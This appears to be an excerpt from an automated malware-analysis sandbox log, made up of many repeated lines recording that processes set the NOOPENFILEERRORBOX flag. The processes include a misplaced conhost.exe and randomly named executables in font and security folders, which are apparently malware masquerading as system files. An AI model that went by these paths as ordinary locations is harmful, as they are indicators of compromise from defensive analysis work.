                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
